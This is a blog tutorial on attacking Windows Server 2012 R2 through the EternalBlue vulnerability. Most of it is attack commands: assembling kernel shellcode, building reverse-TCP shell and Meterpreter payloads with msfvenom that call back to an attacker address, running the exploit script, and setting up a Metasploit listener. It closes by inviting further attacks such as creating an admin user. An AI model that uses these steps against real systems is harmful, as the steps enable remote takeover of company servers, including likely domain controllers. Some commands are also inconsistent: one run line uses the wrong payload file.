How to Attack Windows Server 2012 R2 Using Eternalblue

M'hirsi Hamza
Nov 10, 2020 · 4 min read
Source

How To Attack Windows Server 2012 R2 using Eternalblue

Windows Server 2012 R2 Exploit

Hi Medium! Here we are again with a new article, today we will share a small tutorial where we attack a Windows Server 2012 R2 that it can be in many occasion the AD server of a company, In my last article I shared how we can attack Windows 7, if you want to read the article check this Link

Today we will use two ways the first we get a shell access and in the second we get a Meterpreter access:

1 — Prepare the environment

In this tutorial we need a Kali linux and a Windows Server 2012 R2, before we begin we need to run those command to update our kali OS

$ apt-get update$ apt-get upgrade

We need to power on the Windows Server and get his IP@. If you are in a Pentesting mission and you don’t have the IP target address you just need to run a network scan using nmap :

$ nmap -v -Pn -O <ip range>

2— Create our shellcode

+ First we need to download the shell code developed by Sleepya from this link then we assemble it using nasm (you can download nasm from this link) with this command :

$ nasm -f bin eternalblue_x64_kshellcode.asm

Now we generate the payload using Msfvenom, first one will provide us a reverse shell via TCP and the second a Meterpreter session :

— Reverse Shell :

$ msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=<attacker_ip> LPORT=1234

— Meterpreter session :

$ msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=<attacker_ip> LPORT=1234

+ We need to join or two shellcode to perfom the attack :

kernel code + shell/reverse_tcp :

$ cat eternalblue_x64_kshellcode shell_msf.bin > reverse_shell.bin

kernel code + meterpreter/reverse_tcp :

$ cat eternalblue_x64_kshellcode meterpreter_msf.bin > meterpreter.bin

3— exploit vulnerability

We need now to Download the exploit.py from this link , by default the guest account comes inactive on the Windows server if it was activated by the administrator we can take advantage, else if the administrator gave as an account that will be better. So we need now to add those information in our exploit :

$ nano  eternalblue8_exploit.py

and change the USERNAME and PASSWORD

+ before running the exploit we just need to set up our listener using msfconsole and set the payload :

> use exploit/multi/handler> set PAYLOAD windows/x64/shell/reverse_tcp> set LHOST <attcker_ip@>> set LPORT 1234> exploit

Hey finally know we will run our scripts !! :D

- shell/reverse_tcp :

$ python eternalblue8_exploit.py reverse_shell.bin 500

-meterpreter/reverse_tcp :

$ python eternalblue8_exploit.py <IP@of_the_target> reverse_shell.bin 400

The parameter with the value “500” or “300” is the numGroomconn that adjust the amount of Groom connections helps reaching a contiguous kernel pool memory, if the exploit work but you don’t get your access just increase the numGroomconn.
As you see we get our access, and we can run other attacks and create an admin user and mooooore…..

+ references :

https://github.com/UnaPibaGeek

I hope that you enjoyed this article as always, if you have something to add don’t hesitate to write a comment ^^ and follow me for more interesting article.

The Startup

Get smarter at building your thing. Join The Startup’s +729K followers.